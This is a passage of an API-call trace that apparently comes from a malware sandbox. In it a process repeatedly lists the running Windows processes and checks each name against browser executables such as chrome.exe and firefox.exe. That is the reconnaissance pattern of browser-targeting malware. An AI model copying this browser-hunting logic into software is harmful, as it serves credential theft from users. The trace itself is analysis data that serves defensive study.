lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0234.939] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0234.939] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0234.939] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0234.939] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0234.939] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0234.940] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0234.940] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0234.940] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0234.940] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0234.940] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0234.940] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0234.940] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0234.941] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0234.941] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0234.941] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0234.941] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0234.941] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.941] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0234.941] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0234.941] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0234.941] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0234.941] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0234.942] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0234.942] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0234.942] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0234.942] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0234.942] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0234.942] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0234.942] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.942] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0234.943] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0234.943] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0234.943] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0234.943] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0234.943] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.943] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.943] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0234.944] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0234.944] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0234.944] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0234.944] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.944] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0234.944] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0234.944] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0234.944] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0234.944] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0234.944] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.944] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.945] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0234.945] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0234.945] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0234.945] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0234.945] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.945] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0234.945] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0234.945] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0234.945] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0234.946] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0234.946] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.946] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0234.946] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0234.946] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0234.946] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0234.946] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0234.946] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0234.946] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0234.947] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0234.947] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0234.947] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0234.947] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0234.947] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.947] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0234.947] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0234.947] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0234.947] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0234.947] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0234.947] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.947] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0234.948] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0234.948] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0234.948] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0234.948] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0234.948] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0234.948] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0234.948] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0234.948] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0234.948] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0234.948] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0234.949] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0234.949] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0234.949] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0234.949] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0234.949] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0234.949] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0234.949] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0234.949] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0234.950] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0234.950] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0234.950] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0234.950] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0234.950] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0234.950] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0234.950] CloseHandle (hObject=0xe8) returned 1 [0234.950] Sleep (dwMilliseconds=0x3e8) [0235.968] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0235.970] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0235.970] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0235.970] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0235.970] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0235.971] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0235.971] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0235.971] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0235.971] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0235.971] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0235.971] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0235.971] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0235.971] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0235.971] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0235.972] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0235.972] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0235.972] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0235.972] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0235.972] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.972] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0235.972] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0235.972] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0235.972] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0235.972] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0235.972] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0235.972] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0235.973] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0235.973] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0235.973] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0235.973] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0235.973] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.973] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0235.973] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0235.973] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0235.973] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0235.974] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0235.974] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0235.974] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0235.974] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0235.974] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0235.974] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0235.974] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0235.974] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.974] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0235.975] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0235.975] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0235.975] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0235.975] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0235.975] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.975] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0235.975] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0235.975] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0235.975] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0235.975] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0235.975] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0235.975] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0235.976] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0235.976] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0235.976] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0235.976] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0235.976] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0235.976] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.976] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0235.976] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0235.976] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0235.977] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0235.977] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.977] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.977] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0235.977] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0235.977] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0235.977] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0235.977] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.977] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.978] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0235.978] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0235.978] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0235.978] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0235.978] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.978] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.978] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0235.978] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0235.978] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0235.978] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0235.978] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.978] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.979] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0235.979] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0235.979] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0235.979] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0235.979] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.979] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0235.979] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0235.979] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0235.979] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0235.980] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0235.980] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0235.980] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.980] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0235.980] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0235.980] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0235.980] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0235.980] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.980] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.981] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0235.981] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0235.981] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0235.981] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0235.981] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.981] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0235.981] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0235.981] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0235.981] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0235.981] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0235.981] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0235.981] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, 